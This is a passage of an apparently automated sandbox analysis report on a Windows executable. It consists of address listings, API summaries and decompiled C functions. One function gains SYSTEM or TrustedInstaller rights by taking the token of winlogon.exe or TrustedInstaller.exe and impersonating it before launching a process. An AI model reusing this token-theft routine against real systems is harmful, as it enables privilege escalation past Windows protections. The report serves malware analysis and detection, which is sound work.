                                                                                                                                                                                                                          0x004085c8
                                                                                                                                                                                                                          0x004085cd
                                                                                                                                                                                                                          0x004085cf
                                                                                                                                                                                                                          0x0040867f
                                                                                                                                                                                                                          0x00408688
                                                                                                                                                                                                                          0x0040868d
                                                                                                                                                                                                                          0x0040868f
                                                                                                                                                                                                                          0x00408730
                                                                                                                                                                                                                          0x00408735
                                                                                                                                                                                                                          0x00408737
                                                                                                                                                                                                                          0x0040873d
                                                                                                                                                                                                                          0x00408750
                                                                                                                                                                                                                          0x0040875d
                                                                                                                                                                                                                          0x00408763
                                                                                                                                                                                                                          0x00408770
                                                                                                                                                                                                                          0x00408775
                                                                                                                                                                                                                          0x00408779
                                                                                                                                                                                                                          0x0040878b
                                                                                                                                                                                                                          0x00408790
                                                                                                                                                                                                                          0x004087a2
                                                                                                                                                                                                                          0x004087aa
                                                                                                                                                                                                                          0x004087b8
                                                                                                                                                                                                                          0x004087be
                                                                                                                                                                                                                          0x004087c3
                                                                                                                                                                                                                          0x004087c9
                                                                                                                                                                                                                          0x004087d2
                                                                                                                                                                                                                          0x004087df
                                                                                                                                                                                                                          0x004087e3
                                                                                                                                                                                                                          0x004087e6
                                                                                                                                                                                                                          0x00408801
                                                                                                                                                                                                                          0x004087e8
                                                                                                                                                                                                                          0x004087f8
                                                                                                                                                                                                                          0x004087fe
                                                                                                                                                                                                                          0x00408811
                                                                                                                                                                                                                          0x00408816
                                                                                                                                                                                                                          0x00408816
                                                                                                                                                                                                                          0x0040881c
                                                                                                                                                                                                                          0x00408822
                                                                                                                                                                                                                          0x00408779
                                                                                                                                                                                                                          0x00408824
                                                                                                                                                                                                                          0x00408829
                                                                                                                                                                                                                          0x00408833
                                                                                                                                                                                                                          0x00408834
                                                                                                                                                                                                                          0x00408840
                                                                                                                                                                                                                          0x00408848
                                                                                                                                                                                                                          0x0040884c
                                                                                                                                                                                                                          0x00408850
                                                                                                                                                                                                                          0x00408855
                                                                                                                                                                                                                          0x0040885a
                                                                                                                                                                                                                          0x00408860
                                                                                                                                                                                                                          0x004088ac
                                                                                                                                                                                                                          0x004088b1
                                                                                                                                                                                                                          0x004088b3
                                                                                                                                                                                                                          0x004088bf
                                                                                                                                                                                                                          0x004088c5
                                                                                                                                                                                                                          0x004088cb
                                                                                                                                                                                                                          0x004088da
                                                                                                                                                                                                                          0x004088ea
                                                                                                                                                                                                                          0x004088ed
                                                                                                                                                                                                                          0x004088f8
                                                                                                                                                                                                                          0x004088ff
                                                                                                                                                                                                                          0x00408905
                                                                                                                                                                                                                          0x004088b5
                                                                                                                                                                                                                          0x004088b5
                                                                                                                                                                                                                          0x004088b5
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00408862
                                                                                                                                                                                                                          0x00408862
                                                                                                                                                                                                                          0x0040886d
                                                                                                                                                                                                                          0x00408874
                                                                                                                                                                                                                          0x0040887b
                                                                                                                                                                                                                          0x00408882
                                                                                                                                                                                                                          0x00408889
                                                                                                                                                                                                                          0x00408895
                                                                                                                                                                                                                          0x00408897
                                                                                                                                                                                                                          0x00408658
                                                                                                                                                                                                                          0x00408658
                                                                                                                                                                                                                          0x0040865d
                                                                                                                                                                                                                          0x00408661
                                                                                                                                                                                                                          0x0040866a
                                                                                                                                                                                                                          0x00408673
                                                                                                                                                                                                                          0x00408678
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00408678
                                                                                                                                                                                                                          0x00408860
                                                                                                                                                                                                                          0x00408695
                                                                                                                                                                                                                          0x00408695
                                                                                                                                                                                                                          0x0040869f
                                                                                                                                                                                                                          0x004086a2
                                                                                                                                                                                                                          0x004086af
                                                                                                                                                                                                                          0x004086a4
                                                                                                                                                                                                                          0x004086a7
                                                                                                                                                                                                                          0x004086a7
                                                                                                                                                                                                                          0x004086b4
                                                                                                                                                                                                                          0x004086bf
                                                                                                                                                                                                                          0x004086cb
                                                                                                                                                                                                                          0x004086d3
                                                                                                                                                                                                                          0x004086d7
                                                                                                                                                                                                                          0x004086db
                                                                                                                                                                                                                          0x004086e0
                                                                                                                                                                                                                          0x004086f1
                                                                                                                                                                                                                          0x004086f8
                                                                                                                                                                                                                          0x004086ff
                                                                                                                                                                                                                          0x00408706
                                                                                                                                                                                                                          0x0040870d
                                                                                                                                                                                                                          0x00408719
                                                                                                                                                                                                                          0x0040871b
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040871b
                                                                                                                                                                                                                          0x004085d5
                                                                                                                                                                                                                          0x004085da
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004085ec
                                                                                                                                                                                                                          0x004085ef
                                                                                                                                                                                                                          0x004085f6
                                                                                                                                                                                                                          0x004085fd
                                                                                                                                                                                                                          0x00408604
                                                                                                                                                                                                                          0x0040860b
                                                                                                                                                                                                                          0x00408612
                                                                                                                                                                                                                          0x00408616
                                                                                                                                                                                                                          0x00408620
                                                                                                                                                                                                                          0x0040862a
                                                                                                                                                                                                                          0x00408632
                                                                                                                                                                                                                          0x00408633
                                                                                                                                                                                                                          0x00408638
                                                                                                                                                                                                                          0x0040864f
                                                                                                                                                                                                                          0x00408651
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040854f
                                                                                                                                                                                                                          0x0040854f
                                                                                                                                                                                                                          0x00408550
                                                                                                                                                                                                                          0x00408556
                                                                                                                                                                                                                          0x00408556

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                                                                                                                            • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                                                                                                                            • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                                                                                                                            • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 00408583
                                                                                                                                                                                                                          • swscanf.MSVCRT ref: 00408620
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 00408633
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                                                                                                                          • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                                                                                                                          • API String ID: 3933224404-3784219877
                                                                                                                                                                                                                          • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                                                                                                                          • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                                                          			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                                                                                                                                                                          0x00401fe6
                                                                                                                                                                                                                          0x00401ff1
                                                                                                                                                                                                                          0x00401ff3
                                                                                                                                                                                                                          0x00401fff
                                                                                                                                                                                                                          0x00402002
                                                                                                                                                                                                                          0x004020a8
                                                                                                                                                                                                                          0x004020ab
                                                                                                                                                                                                                          0x004020f3
                                                                                                                                                                                                                          0x004020f6
                                                                                                                                                                                                                          0x00402162
                                                                                                                                                                                                                          0x00402165
                                                                                                                                                                                                                          0x004021f2
                                                                                                                                                                                                                          0x004021f5
                                                                                                                                                                                                                          0x00402235
                                                                                                                                                                                                                          0x00402238
                                                                                                                                                                                                                          0x004022be
                                                                                                                                                                                                                          0x0040223a
                                                                                                                                                                                                                          0x0040223a
                                                                                                                                                                                                                          0x00402240
                                                                                                                                                                                                                          0x0040224b
                                                                                                                                                                                                                          0x0040224e
                                                                                                                                                                                                                          0x00402251
                                                                                                                                                                                                                          0x00402254
                                                                                                                                                                                                                          0x00402259
                                                                                                                                                                                                                          0x0040225e
                                                                                                                                                                                                                          0x00402262
                                                                                                                                                                                                                          0x00402264
                                                                                                                                                                                                                          0x00402264
                                                                                                                                                                                                                          0x00402264
                                                                                                                                                                                                                          0x00402262
                                                                                                                                                                                                                          0x00402266
                                                                                                                                                                                                                          0x0040226c
                                                                                                                                                                                                                          0x00402271
                                                                                                                                                                                                                          0x00402274
                                                                                                                                                                                                                          0x00402276
                                                                                                                                                                                                                          0x0040229a
                                                                                                                                                                                                                          0x0040229a
                                                                                                                                                                                                                          0x00402278
                                                                                                                                                                                                                          0x00402296
                                                                                                                                                                                                                          0x00402296
                                                                                                                                                                                                                          0x0040229c
                                                                                                                                                                                                                          0x0040229c
                                                                                                                                                                                                                          0x004022c0
                                                                                                                                                                                                                          0x004022c2
                                                                                                                                                                                                                          0x004022c8
                                                                                                                                                                                                                          0x004022c8
                                                                                                                                                                                                                          0x004022c8
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004022c0
                                                                                                                                                                                                                          0x00402201
                                                                                                                                                                                                                          0x00402203
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402220
                                                                                                                                                                                                                          0x00402225
                                                                                                                                                                                                                          0x00402227
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040222d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040222d
                                                                                                                                                                                                                          0x00402173
                                                                                                                                                                                                                          0x00402179
                                                                                                                                                                                                                          0x0040217b
                                                                                                                                                                                                                          0x0040217e
                                                                                                                                                                                                                          0x00402183
                                                                                                                                                                                                                          0x00402185
                                                                                                                                                                                                                          0x00402188
                                                                                                                                                                                                                          0x0040218d
                                                                                                                                                                                                                          0x0040218f
                                                                                                                                                                                                                          0x00402192
                                                                                                                                                                                                                          0x004021a2
                                                                                                                                                                                                                          0x004021a7
                                                                                                                                                                                                                          0x004021a9
                                                                                                                                                                                                                          0x004021ac
                                                                                                                                                                                                                          0x004021cc
                                                                                                                                                                                                                          0x004021d1
                                                                                                                                                                                                                          0x004021d3
                                                                                                                                                                                                                          0x004021db
                                                                                                                                                                                                                          0x004021db
                                                                                                                                                                                                                          0x004021e1
                                                                                                                                                                                                                          0x004021e1
                                                                                                                                                                                                                          0x004021e7
                                                                                                                                                                                                                          0x004021e7
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402192
                                                                                                                                                                                                                          0x004020fe
                                                                                                                                                                                                                          0x00402103
                                                                                                                                                                                                                          0x00402105
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402111
                                                                                                                                                                                                                          0x00402114
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00402114
                                                                                                                                                                                                                          0x004020ad
                                                                                                                                                                                                                          0x004020b4
                                                                                                                                                                                                                          0x004020b9
                                                                                                                                                                                                                          0x004020bc
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004020c2
                                                                                                                                                                                                                          0x004020c4
                                                                                                                                                                                                                          0x004020ce
                                                                                                                                                                                                                          0x004020d0
                                                                                                                                                                                                                          0x004020d3
                                                                                                                                                                                                                          0x004020d4
                                                                                                                                                                                                                          0x004020d5
                                                                                                                                                                                                                          0x004020e6
                                                                                                                                                                                                                          0x004020e7
                                                                                                                                                                                                                          0x004020d7
                                                                                                                                                                                                                          0x004020d7
                                                                                                                                                                                                                          0x004020dd
                                                                                                                                                                                                                          0x004020de
                                                                                                                                                                                                                          0x004020df
                                                                                                                                                                                                                          0x004020df
                                                                                                                                                                                                                          0x004020ec
                                                                                                                                                                                                                          0x004020ef
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004020ef
                                                                                                                                                                                                                          0x00402008
                                                                                                                                                                                                                          0x00402016
                                                                                                                                                                                                                          0x0040201d
                                                                                                                                                                                                                          0x0040202e
                                                                                                                                                                                                                          0x00402035
                                                                                                                                                                                                                          0x00402044
                                                                                                                                                                                                                          0x00402049
                                                                                                                                                                                                                          0x00402055
                                                                                                                                                                                                                          0x00402064
                                                                                                                                                                                                                          0x00402068
                                                                                                                                                                                                                          0x0040206e
                                                                                                                                                                                                                          0x0040208b
                                                                                                                                                                                                                          0x00402070
                                                                                                                                                                                                                          0x00402082
                                                                                                                                                                                                                          0x00402088
                                                                                                                                                                                                                          0x0040209e
                                                                                                                                                                                                                          0x004020a1
                                                                                                                                                                                                                          0x00402119
                                                                                                                                                                                                                          0x00402119
                                                                                                                                                                                                                          0x0040211b
                                                                                                                                                                                                                          0x0040211e
                                                                                                                                                                                                                          0x0040211e
                                                                                                                                                                                                                          0x00402149
                                                                                                                                                                                                                          0x00402151
                                                                                                                                                                                                                          0x00402151
                                                                                                                                                                                                                          0x00402157
                                                                                                                                                                                                                          0x00402157
                                                                                                                                                                                                                          0x004022cb
                                                                                                                                                                                                                          0x004022d2
                                                                                                                                                                                                                          0x004022d2

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040201D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402035
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00402050
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040205F
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 004020B4
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 004020D7
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                                                                                                                          • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                                                                                                                          • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                                                                                                                            • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                                                                                                                            • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                                                                                                                            • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                                                                                                                            • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                                                                                                                            • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                                                                                                                            • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                                                                                                                            • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                                                                                                                            • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                                                                                                                            • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                                                                                                                            • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                                                                                                                            • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                                                                                                                            • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                                                                                                                            • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00402259
                                                                                                                                                                                                                          • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                                                                                                                          • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                                                                                                                          • API String ID: 3201562063-2355939583
                                                                                                                                                                                                                          • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                                                                                                                          • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                                                                                                                                                                          0x00409924
                                                                                                                                                                                                                          0x0040992c
                                                                                                                                                                                                                          0x00409937
                                                                                                                                                                                                                          0x0040993f
                                                                                                                                                                                                                          0x0040994a
                                                                                                                                                                                                                          0x00409956
                                                                                                                                                                                                                          0x00409962
                                                                                                                                                                                                                          0x0040996e
                                                                                                                                                                                                                          0x00409971
                                                                                                                                                                                                                          0x00409973
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409976
                                                                                                                                                                                                                          0x00409977

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                          • API String ID: 1529661771-70141382
                                                                                                                                                                                                                          • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                                                                                                                          • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2827331108-0
                                                                                                                                                                                                                          • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
